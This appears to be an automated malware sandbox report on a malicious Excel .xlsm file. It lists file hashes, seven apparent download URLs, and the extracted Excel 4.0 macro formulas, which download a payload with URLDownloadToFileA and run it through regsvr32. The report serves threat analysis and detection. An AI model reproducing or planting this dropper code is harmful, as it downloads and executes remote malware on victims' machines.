Overview

overview

10

Static

static

10

7abce88c12...5.xlsm

windows7-x64

10

7abce88c12...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    7abce88c1258a0c723fdffaf8135fdf00a78221df95978187de5fb567af627c5

  • Size

    35KB

  • Sample

    241120-xl4dts1crf

  • MD5

    79e7c9ec84e0533f680b0e1c4dd83af1

  • SHA1

    75ef704c542fa1e2f790fbe7cb6e32fe6efef8ef

  • SHA256

    7abce88c1258a0c723fdffaf8135fdf00a78221df95978187de5fb567af627c5

  • SHA512

    258f9f6e02658a6188d0f9659889fe7ac5c5bbe75a8142e75b6a33cbbb8041ab775be6e96e02ee79bcdd197c67f026eb7dd9728bf51523a74e60e7cc4a74b29b

  • SSDEEP

    768:CFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:ytTghUOZZ1ZYpoQ/pMAz

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/

https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/

https://globaltextiles.net/cgi-bin/7naWzYGRrrN/

https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/

https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/

https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/

https://ihmsswiss.ch/wp-admin/gUOq0e/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/7naWzYGRrrN/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ihmsswiss.ch/wp-admin/gUOq0e/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/
xlm40.dropper

https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/
xlm40.dropper

https://globaltextiles.net/cgi-bin/7naWzYGRrrN/
xlm40.dropper

https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/

Targets

    • Target

      7abce88c1258a0c723fdffaf8135fdf00a78221df95978187de5fb567af627c5

    • Size

      35KB

    • MD5

      79e7c9ec84e0533f680b0e1c4dd83af1

    • SHA1

      75ef704c542fa1e2f790fbe7cb6e32fe6efef8ef

    • SHA256

      7abce88c1258a0c723fdffaf8135fdf00a78221df95978187de5fb567af627c5

    • SHA512

      258f9f6e02658a6188d0f9659889fe7ac5c5bbe75a8142e75b6a33cbbb8041ab775be6e96e02ee79bcdd197c67f026eb7dd9728bf51523a74e60e7cc4a74b29b

    • SSDEEP

      768:CFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:ytTghUOZZ1ZYpoQ/pMAz

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks